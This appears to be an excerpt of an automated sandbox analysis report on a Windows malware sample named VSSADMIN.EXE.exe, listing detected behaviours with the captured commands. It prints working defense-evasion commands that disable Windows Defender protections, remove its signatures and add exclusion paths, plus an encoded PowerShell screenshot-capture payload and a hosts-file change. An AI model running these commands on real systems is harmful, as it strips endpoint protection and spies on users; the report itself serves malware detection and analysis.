              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              DLL side loading technique detected
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Modifies the hosts file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0ac